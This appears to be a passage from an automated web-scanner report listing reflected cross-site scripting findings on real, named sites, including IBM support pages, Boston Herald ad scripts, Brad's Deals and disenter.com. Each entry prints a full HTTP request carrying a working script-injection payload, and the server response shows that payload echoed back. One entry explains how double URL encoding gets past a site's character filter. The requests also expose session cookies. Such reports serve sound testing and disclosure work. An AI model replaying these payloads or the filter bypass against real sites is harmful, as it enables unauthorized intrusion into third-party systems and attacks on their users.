Host: www-01.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-01.ibm.com/support/docview.wss?uid=swg27016186
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:59:05 GMT
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: 17 09 2011 01:59:01 GMT
Last-Modified: Tue, 16 Aug 2011 14:20:44 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Length: 127919


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
true && !"https://www-304.ibm.com".match(window.location.protocol + "//" + window.location.host) ){
   window.location.href = "https://www-304.ibm.com" + location.pathname + "?" + "uid=swg27016186&aid=13ee43";alert(1)//c5b4f1caeae";
}
//-->
...[SNIP]...

4.198. http://www-01.ibm.com/support/docview.wss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-01.ibm.com
Path:   /support/docview.wss

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85b6b"%3balert(1)//fa0f012bf87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85b6b";alert(1)//fa0f012bf87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/docview.wss?uid=swg27016186&85b6b"%3balert(1)//fa0f012bf87=1 HTTP/1.1
Host: www-01.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?q=faq+help+phone+xss&cc=us&en=utf&co=us&sn=mh&lang=en&lo=any&hpp=100
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:59:02 GMT
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: 17 09 2011 01:59:06 GMT
Last-Modified: Tue, 16 Aug 2011 14:20:44 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Length: 127991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...

if ( true && !"https://www-304.ibm.com".match(window.location.protocol + "//" + window.location.host) ){
   window.location.href = "https://www-304.ibm.com" + location.pathname + "?" + "uid=swg27016186&85b6b";alert(1)//fa0f012bf87=1";
}
//-->
...[SNIP]...

4.199. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-146.ibm.com
Path:   /nfluent/transwidget/tw.jsp

Issue detail

The value of the cd request parameter is copied into the HTML document as plain text between tags. The payload f6c04<script>alert(1)</script>029fe2ca8fe was submitted in the cd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nfluent/transwidget/tw.jsp?app=ibm-esupport.dBlue&from=en_US&sl=1&banner=1&style=minimal&corr=0&cd=.ibm.comf6c04<script>alert(1)</script>029fe2ca8fe&ratefunc=showRateThis HTTP/1.1
Host: www-146.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-01.ibm.com/support/docview.wss?uid=swg27016186
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:59:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/x-javascript;charset=utf-8
Content-Length: 23500


/*
IBM Confidential
RTTS Real Time Language Translation Solution Offering
.. Copyright IBM Corporation 2010. All rights reserved.    
*/
var _tw_savelang_ = true;

function loadRemoteScript(doc, src
...[SNIP]...
i + "=" + t[i];
    }    
}
return l;
}

function unsetTargetLang() {
var now = new Date();
now.setTime(now.getTime()+8000);
document.cookie = "twlang=tobedeleted; path=/; domain=.ibm.comf6c04<script>alert(1)</script>029fe2ca8fe; expires=" + now.toGMTString();
}


function doTranslate(dl) {
if (window.IETRAN ) {
// spc removed afecting lang change: && window.IETRAN.mode!="translating"
// write a cookie that indicat
...[SNIP]...

4.200. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-146.ibm.com
Path:   /nfluent/transwidget/tw.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1330d<script>alert(1)</script>fa0c503d6f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nfluent/transwidget/tw.jsp?app=ibm-esupport.dBlue&from=en_US&sl=1&banner=1&style=minimal&corr=0&cd=.ibm.com&ratefunc=showRateThis&1330d<script>alert(1)</script>fa0c503d6f7=1 HTTP/1.1
Host: www-146.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-01.ibm.com/support/docview.wss?uid=swg27016186
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:59:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/x-javascript;charset=utf-8
Content-Length: 23325


/*
IBM Confidential
RTTS Real Time Language Translation Solution Offering
.. Copyright IBM Corporation 2010. All rights reserved.    
*/
var _tw_savelang_ = true;

function loadRemoteScript(doc, src
...[SNIP]...
+ "&svcid="+
encodeURIComponent(dl) +
"&domain=" + window.location.hostname +
           "&cd=.ibm.com&style=minimal&app=ibm-esupport.dBlue&ratefunc=showRateThis&sl=1&from=en_US&corr=0&banner=1&1330d<script>alert(1)</script>fa0c503d6f7=1");
}
}

// force resetting language to NULL
if (document.getElementById('ietran_ui_langselect')) {
       document.getElementById('ietran_ui_langselect').selectedIndex = 0;
}

function translate_cookie
...[SNIP]...

4.201. http://www.bostonherald.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29438</script><script>alert(1)</script>4a2836315d8 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom29438</script><script>alert(1)</script>4a2836315d8&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2058
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom29438</script><script>alert(1)</script>4a2836315d8!Top">
...[SNIP]...

4.202. http://www.bostonherald.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b32"><script>alert(1)</script>25d9280badf was submitted in the companion parameter. This input was echoed as e0b32\"><script>alert(1)</script>25d9280badf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottome0b32"><script>alert(1)</script>25d9280badf&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2022
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottome0b32\"><script>alert(1)</script>25d9280badf!Top">
...[SNIP]...

4.203. http://www.bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b4e3%2527%253balert%25281%2529%252f%252ff403c5bda40 was submitted in the page parameter. This input was echoed as 1b4e3';alert(1)//f403c5bda40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome1b4e3%2527%253balert%25281%2529%252f%252ff403c5bda40 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1926
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home1b4e3';alert(1)//f403c5bda40@Top,Middle,Middle1,Bottom!Top">
...[SNIP]...

4.204. http://www.bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf15e"><script>alert(1)</script>1faf1e5fa2d was submitted in the page parameter. This input was echoed as cf15e\"><script>alert(1)</script>1faf1e5fa2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhomecf15e"><script>alert(1)</script>1faf1e5fa2d HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2022
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/homecf15e\"><script>alert(1)</script>1faf1e5fa2d@Top,Middle,Middle1,Bottom!Top">
...[SNIP]...

4.205. http://www.bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb023</script><script>alert(1)</script>00169391e20 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Topcb023</script><script>alert(1)</script>00169391e20&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2053
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
EBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Topcb023</script><script>alert(1)</script>00169391e20">
...[SNIP]...

4.206. http://www.bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a35d2"><script>alert(1)</script>0f35d246a26 was submitted in the position parameter. This input was echoed as a35d2\"><script>alert(1)</script>0f35d246a26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Topa35d2"><script>alert(1)</script>0f35d246a26&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2017
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Topa35d2\"><script>alert(1)</script>0f35d246a26">
...[SNIP]...

4.207. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d6a8"><a%20b%3dc>0224ef48290 was submitted in the s parameter. This input was echoed as 5d6a8"><a b=c>0224ef48290 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b5d6a8"><a%20b%3dc>0224ef48290&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:43 GMT
Content-Length: 23962

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe t
...[SNIP]...
<input type="hidden" name="source" value="adcom|display|comscore55-300redmixr-b5d6a8"><a b=c>0224ef48290" />
...[SNIP]...

4.208. http://www.disenter.com/search.php [searchString parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.disenter.com
Path:   /search.php

Issue detail

The value of the searchString request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4667</script><script>alert(1)</script>f8ab18f3250b7f3c2 was submitted in the searchString parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.php?searchString=xssa4667</script><script>alert(1)</script>f8ab18f3250b7f3c2&enter=Search+Newsgroups HTTP/1.1
Host: www.disenter.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/
Cache-Control: max-age=0
Origin: http://www.disenter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:33:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 15595

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8">
<TITLE>Free Usenet News Servers Index and Search Tools</TITLE>
<META content="Usenet, binaries Newsgroups, giganews, n
...[SNIP]...
<script>var searchStr='xssa4667</script><script>alert(1)</script>f8ab18f3250b7f3c2'; var colm=''; var order=''; var items='10'; var srv = new Array;var t = new Array;var p = new Array;srv[1395] = '76-10-159-15.dsl.teksavvy.com';
t[1395] = '46';
p[1395] = 'NO';
srv[72] = 'post.ne
...[SNIP]...

4.209. http://www.disenter.com/search.php [searchString parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.disenter.com
Path:   /search.php

Issue detail

The value of the searchString request parameter is copied into the HTML document as plain text between tags. The payload 52539<script>alert(1)</script>ab8e54a56626fa6f2 was submitted in the searchString parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /search.php?searchString=xss52539<script>alert(1)</script>ab8e54a56626fa6f2&enter=Search+Newsgroups HTTP/1.1
Host: www.disenter.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/
Cache-Control: max-age=0
Origin: http://www.disenter.com
